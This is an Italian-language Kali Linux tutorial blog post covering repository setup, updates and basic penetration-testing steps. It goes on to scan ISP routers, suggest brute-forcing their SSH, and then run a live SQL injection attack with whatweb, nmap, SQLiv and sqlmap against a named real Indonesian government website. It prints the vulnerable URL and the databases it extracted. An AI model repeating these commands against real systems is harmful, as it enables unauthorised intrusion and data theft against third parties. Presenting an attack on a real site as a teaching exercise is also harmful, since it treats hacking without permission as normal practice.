Tutorial Kali Linux

Kali Linux Tutorial



Se sei un esperto o almeno familiarità con Linux, comandi e ambiente, hai appena installato Kali Linux sulla tua macchina, volevi diventare un Master di Kali Linux o un Ethical Hacker allora sei nel posto giusto. In questo articolo, tratterò un tutorial di Kali Linux per utenti Linux che non hanno già familiarità con Kali e inizierò su alcune delle tecniche di base utilizzate per l'hacking e i test di sicurezza durante l'utilizzo di Kali.

Cos'è Kali Linux?

Kali Linux, ( pubblicato per la prima volta il 13 marzo 2013 ) che era formalmente noto come BackTrack, sviluppato dalla società di sicurezza Offensive Security, è una distribuzione forense e incentrata sulla sicurezza basata sul ramo Testing di Debian. Kali Linux è progettato pensando ai test di penetrazione, al recupero dei dati e al rilevamento delle minacce. Il progetto è passato a un modello di rilascio continuo all'inizio di quest'anno nel tentativo di fornire utilità di sicurezza più aggiornate agli utenti della distribuzione. Kali Linux è gratuito e lo sarà sempre. Ha oltre 600 strumenti di test di penetrazione inclusi.







Perché Kali Linux? È giusto per te?

Kali Linux ha guadagnato molta popolarità di recente. E c'è una ragione dietro a ciò. L'hacking è tornato come la cosa più interessante da fare nella cultura popolare e questo può essere attribuito in modo significativo alla serie TV Mr. Robot. La popolarità di Mr. Robot ha aiutato Kali Linux a ottenere nuovi utenti. Le persone con quasi nessuna conoscenza di Linux o di qualsiasi cosa relativa alla sicurezza informatica stanno ora cercando di utilizzare Kali come distribuzione principale di Linux.



La nostra distribuzione di test di penetrazione più avanzata di sempre. – Sviluppatori Kali Linux. (È scritto sulla pagina principale di Kali.org nella parte superiore della pagina.) Cosa ottieni da questa affermazione? Notate questo: APTD (Advanced Penetration Testing Distribution)? Non esiste un termine hacking qui letteralmente. Kali Linux è uguale ad altre distribuzioni Linux. Detto semplicemente, è una distribuzione Linux ricca di strumenti relativi alla sicurezza e mirata agli esperti di sicurezza di reti e computer. Tuttavia, l'uso di Kali Linux si concentra solo sulla sicurezza e sulla medicina legale.



Una distribuzione Linux non è altro che un pacchetto contenente il kernel Linux, un insieme di utilità e applicazioni principali e alcune impostazioni predefinite. Quindi, Kali Linux non offre qualcosa di unico in questo senso, la maggior parte degli strumenti forniti potrebbe essere installata su qualsiasi distribuzione Linux.





Kali Linux è specificamente progettato per soddisfare i requisiti dei test di penetrazione professionale e del controllo della sicurezza. È rivolto a un particolare sottoinsieme di utenti Linux. Pentester, hacker, ecc. Non è una distribuzione consigliata se ti aspetti Kali per desktop Linux generico per sviluppo, web design, giochi, ufficio, ecc. Kali potrebbe darti alcune sfide, anche se sei un utente Linux esperto .

COSE DA FARE DOPO L'INSTALLAZIONE DI KALI LINUX

Dopo aver installato Kali Linux, potresti chiederti cosa fare dopo con questo, giusto?. Tutti affrontano questo problema, non preoccuparti.



FASE 1: CONFIGURAZIONE DEL REPOSITORY

Innanzitutto, potresti già saperlo, ma è fondamentale impostare correttamente il repository. Come ho detto, il modello di rilascio progressivo di Kali Linux è nel tentativo di fornire utilità di sicurezza più aggiornate agli utenti della distribuzione. In genere, se hai Kali Linux appena installato, il repository fa riferimento al supporto che stai utilizzando per l'installazione. Per risolvere questo problema è necessario modificare il repository nel repository ufficiale di Kali Linux. Il file richiesto si trova sotto /etc/apt/sources.list . Apri il file con l'editor di testo leafpad e sostituisci il repository predefinito con questo repository ufficiale di Kali Rolling:

deb http://http.kali.org/kali kali-rolling main contrib non-free # For source package access, uncomment the following line # deb-src http://http.kali.org/kali kali-rolling main contrib non-free 

FASE 2: AGGIORNA E MIGLIORA IL TUO KALI LINUX

Dopo aver aggiornato e aggiornato il tuo sistema, sincronizza Kali Linux con l'ultima versione. Per farlo apri il terminale e digita:

apt update -y && apt upgrade -y && apt dist-upgrade 

Il comando apt update scarica e recupera le informazioni sugli elenchi dei pacchetti dai repository e le aggiorna per ottenere informazioni sulle versioni più recenti dei pacchetti e sulle loro dipendenze.

Il comando apt upgrade scarica e installa la versione più recente dei pacchetti dei pacchetti Kali Linux installati purché non presenti errori sulle dipendenze.

L'apt dist-upgrade aggiornerà tutti i pacchetti alla versione più recente disponibile, qualunque cosa accada. E anche installa e rimuovi le dipendenze secondo necessità (installa le dipendenze per soddisfare i pacchetti, ovviamente, ma rimuovi anche le dipendenze che sono diventate orfane se un pacchetto che è stato aggiornato non ha più bisogno della dipendenza.

CONCETTO DI BASE DEL TEST DI PENETRAZIONE CON KALI LINUX

Dopo aver eseguito con successo questi passaggi, ci sono tre cose principali che potresti fare con Kali Linux in base al sistema di destinazione, tra cui:

  1. Hacking della rete wireless – Hacking Wi-Fi, Phising, ARP Poisoning, ecc.
  2. Hacking di app Web – SQL Injection, Cross-Site Request Forgery (CSRF), Web Phising, ecc.
  3. Hacking del dispositivo – Sfrutta la macchina bersaglio per prenderne il controllo.

Non sto includendo l'hacking IoT, ciò non significa che Kali Linux non abbia capacità per questo scopo. Ma, letteralmente, potrebbe appartenere anche a Device Hacking. Dal momento che il dispositivo ha aspetto fisico e forma. In questo tutorial ho coperto la conoscenza di base di loro. Dal momento che Kali Linux è enorme, non si adatta a un articolo!

È inoltre necessario conoscere il ciclo o la procedura del test di penetrazione. Loro sono:

  1. Ricognizione – Raccolta di informazioni
  2. Scansione
  3. operazione
  4. Post-sfruttamento

HACKER DI RETE WIRELESS CON KALI LINUX

In termini di hacking della rete wireless, la vittima può variare. Perché le reti wireless sono costituite da diverse cose, come l'ISP (Internet Service Provider), il router e i suoi compagni (modem, hub, switch, ecc.) e i client (utenti, CCTV, computer remoto, ecc.). Hanno anche possibilità vulnerabili.

Internet è un'aggregazione ampia e complessa di hardware di rete, collegati tra loro da gateway. Tenere traccia del percorso seguito dai pacchetti è importante per sapere come si raggiunge un determinato nome host o indirizzo IP di destinazione.

Kali Linux ha uno strumento integrato chiamato Traceroute. Traceroute utilizza il protocollo IP time to live field e tenta di ottenere una risposta ICMP TIME_EXCEEDED da ciascun gateway lungo il percorso verso un host. Traceroute tenta di tracciare il percorso che un pacchetto IP seguirebbe verso un host Internet lanciando pacchetti di sonda con un piccolo TTL (time to live) e quindi ascoltando una risposta ICMP che ha superato il tempo da un gateway. Ti darò un esempio come tracciare un router ISP utilizzato per gestire la nostra connessione utilizzando Traceroute.

1. Riconoscimento

La raccolta di informazioni è l'inizio più importante, non perdere questo passaggio. In questo passaggio, il nostro scopo è ottenere il maggior numero possibile di informazioni utili che potremmo ottenere, quindi queste informazioni vengono utilizzate per ulteriori passaggi.

Innanzitutto, apri un terminale e digita questo comando per iniziare a tracciare la strada per il sito, in questo caso ho impostato il sito su google.com.

traceroute google.com 

Screenshot di Traceroute

2. Scansione

Una volta lanciati i comandi, elencherà dove va il nostro pacchetto in sequenza. Come puoi vedere sopra, ho ottenuto 3 hop, uno dei quali è il mio server ISP. Il primo IP nell'elenco è il mio router, che funge da gateway. E i due successivi appartengono al mio ISP. Ora controlliamo il servizio che stanno eseguendo usando Nmap. Quindi, gli obiettivi che andremo a scansionare sono 10.152.192.1 e 10.13.223.102 . Nel terminale ho eseguito il seguente comando:

nmap -v -sS [IP Target] -Pn 

Analizziamo l'argomento del comando:

-v = Abilita la modalità verbosità

-sS = Usa la tecnica di scansione TCP SYN

-Pn = Tratta tutti gli host come online — salta la scoperta dell'host

Ed ecco il risultato che abbiamo ottenuto.

schermata nmap 2

Purtroppo, tutte le porte attive 10.152.192.1 vengono filtrati, significa che tutte le connessioni TCP in entrata sono bloccate da IDS o Firewall su questo IP. Ora, facciamo un'altra scansione al secondo obiettivo.

schermata nmap 1

3. Operazione

In questa procedura, non intendo condurre il vero sfruttamento, invece ti mostro come. Sulla base del risultato della scansione Nmap sopra, sappiamo che questo IP ha un server SSH in esecuzione sulla porta 22 ed è aperto. È aperto per essere brutalmente forzato, ahah! Abbiamo trovato il buco, questo server SSH è il possibile buco a cui potremmo tentare di accedere. Esistono diversi strumenti in Kali Linux che supportano attacchi di forza bruta o dizionario contro il protocollo SSH. Il più popolare e potente è Hydra.

Ok, questa era una procedura di base per condurre un test di penetrazione su un server mirato, che nel nostro esempio qui è il mio server ISP.

APP WEB HACKING CON KALI LINUX

In realtà, se ti appassiona, puoi configurare il tuo ambiente di hacking installando DWVA (Damn Vulnerable Web App) nel tuo Kali Linux. È un'applicazione web PHP/MySQL che ha un sacco di buchi vulnerabili. I suoi obiettivi principali sono di aiutare i professionisti della sicurezza a testare le proprie competenze e strumenti in un ambiente legale e aiutare gli sviluppatori web a comprendere meglio i processi di protezione delle applicazioni web. Puoi ottenere DWVA gratuitamente su Github qui: https://github.com/ethicalhack3r/DVWA.

Per ora ti mostrerò come eseguire l'hacking di app Web su un sito reale. Ma, promettimi che è limitato solo a scopo educativo. Simuleremo un vero attacco al sito reale utilizzando SQL injection.

Prerequisito

Strumenti coperti:

– Whatweb (preinstallato)

– Nmap (preinstallato)

– SQLiv (installa manualmente)

– SQLMap (preinstallato)

Abbiamo bisogno di un altro strumento aggiuntivo disponibile su Github qui: https://github.com/Hadesy2k/sqliv, installalo prima sul nostro Kali Linux. Questo strumento chiamato SQLiv che è in grado di eseguire scansioni mirate fornendo un dominio specifico (con scansione). Digita nel terminale:

git clone https://github.com/Hadesy2k/sqliv.git cd sqliv && sudo python2 setup.py -i 

Target: www.trenggalekkab.go.id

1. Riconoscimento

Raccogli tutte le informazioni utili che possiamo ottenere. Potremmo aprire la pagina web e rilevare quale applicazione è in esecuzione su questo sito. Innanzitutto, controlliamo che tipo di sito Web è. Useremo whatweb per farlo.

whatweb www.trenggalekkab.go.id 

Quale schermata web

Come puoi vedere dal risultato sopra, l'obiettivo si trova in Indonesia. Sta correndo Apache v2.2.27 sul suo server web e ha anche PHP v5.4.31 , ha un indirizzo IP 103.247.21.142 . Ok, prendine nota. Potrebbe essere necessario visitare la sua pagina Web, cercando il file o la pagina costruita, i parametri URL o persino il modulo di accesso. Per ora abbiamo bisogno di quell'indirizzo IP per il prossimo passo che è la scansione.

2. Scansione

Come prima, usiamo di nuovo Nmap per scansionare quali porte e servizi sono in esecuzione sul target.

nmap -v -sS 103.247.21.142 

Ed ecco il risultato che abbiamo ottenuto:

Completed SYN Stealth Scan at 21:22, 261.93s elapsed (1000 total ports) Nmap scan report for ip-103-247-21-142.wifian.net.id (103.247.21.142) Host is up (0.069s latency). Not shown: 985 closed ports PORT STATE SERVICE 21/tcp open ftp 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 143/tcp open imap 212/tcp open anet 443/tcp open https 465/tcp open smtps 587/tcp open submission 993/tcp open imaps 995/tcp open pop3s 3128/tcp filtered squid-http  3306/tcp open mysql  

Ci sono un sacco di porte aperte che gestiscono ogni servizio sul target, ma quello che sembra accattivante è il servizio mysql sulla porta 3306. È indicato che questo sito sta usando mysql per gestire le proprie informazioni in banche dati. Quindi, mi chiedo se ci sono vulnerabilità di SQL Injection su questo sito. Quindi, eseguo nuovamente la scansione del sito utilizzando SQLiv che abbiamo appena installato. ho digitato il comando:

sqliv -t www.trenggalekkab.go.id 

Schermata di SQLHacking1

Abbiamo trovato 2 possibili URL vulnerabili SQL su questo sito. Prendi nota di quegli URL.

3. Operazione

Ok, abbiamo URL vulnerabili SQL e pronti per l'esecuzione. Per farlo utilizzeremo SQLMap. La sintassi è:

sqlmap [Vulnerable URL] --dbs 

Il comando dovrebbe assomigliare a questo:

 sqlmap -u "http://www.trenggalekkab.go.id/berita.php?page=208" --dbs 

L'argomento –dbs serve a dire a SQLMap di ottenere i database di destinazione. Ecco l'output che abbiamo ottenuto:

[INFO] the back-end DBMS is MySQL web application technology: PHP 5.4.31, Apache 2.2.27 back-end DBMS: MySQL 5 [21:46:04] [INFO] fetching database names [21:46:04] [INFO] the SQL query used returns 2 entries [21:46:04] [INFO] resumed: information_schema [21:46:04] [INFO] resumed: trengkab_trg available databases [2]: [*] information_schema [*] trengkab_trg 

SQLMap ha trovato 2 database, ma solo uno di essi contiene dati sensibili, come un account di credenziali di amministratore. Questo è su trengkab_trg. Dopo aver trovato i database, c'è ancora un altro passaggio che dovremmo fare. Questo è trovare le tabelle e le colonne e il passaggio finale è scaricare i dati. Non ti mostrerò come qui in questa sezione, usando questo obiettivo. Almeno conosci l'idea di base sul ciclo di attacco e sull'utilizzo di alcuni strumenti.

HACKER DI DISPOSITIVI

In un futuro articolo su questo sito tratteremo l'hacking dei dispositivi, restate sintonizzati. Come pre-avvertimento, assicurati di conoscere un po' di Python per questo.